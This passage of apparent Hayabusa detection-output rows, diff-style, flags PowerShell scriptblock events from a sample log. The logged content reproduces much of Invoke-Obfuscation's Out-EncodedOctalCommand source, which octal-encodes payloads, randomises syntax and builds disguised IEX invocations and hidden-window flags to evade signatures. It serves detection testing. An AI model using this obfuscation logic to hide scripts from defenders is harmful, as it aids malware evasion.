[String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Octal values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedOctalCommand { <# .SYNOPSIS Generates octal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedOctalCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedOctalCommand encodes an input PowerShell scriptblock or path as an octal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInteractive -NoProfil ""( '127f162f151X164B145f55R110_157@163{164f40n47{110R145{154R154f157{40X127B157{162X154f144L41f47R40L55n106{157{162f145@147X162@157X165n156f144L103L157L154_157f162_40L107f162R145f145f156f73_40@127<162_151{164_145{55B110<157X163f164X40X47_117{142f146_165L163f143@141L164n151_157f156R40_122@157{143X153R163R41_47_40R55R106_157f162f145@147n162{157{165B156X144f103B157{154<157L162<40f107<162<145<145_156'.SPlIt( 'LX@fR_Bn{<' ) |% {( [Char] ([Convert]::ToInt16( ( [String]$_),8 ) )) }) -Join''| Invoke-Expression"" C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX(-Join (( 127 ,162 ,151 ,164 , 145 , 55 ,110, 157, 163 , 164 , 40,47 , 110 , 145 , 154 ,154 ,157,40 , 127 ,157,162 , 154,144, 41 , 47 , 40 ,55 ,106 ,157, 162 , 145 , 147,162,157, 165,156 ,144, 103, 157 ,154, 157,162, 40,107 ,162 , 145 , 145 , 156,73 , 40,127 ,162, 151,164 ,145,55 , 110 , 157,163,164 , 40 ,47,117 ,142,146, 165 ,163 , 143 ,141, 164,151 , 157, 156,40,122 ,157, 143 , 153, 163,41, 47,40 ,55 ,106 , 157, 162, 145,147, 162 , 157,165, 156 ,144, 103 , 157,154,157 , 162,40, 107, 162,145, 145,156)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})) .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 8 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Octal values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) 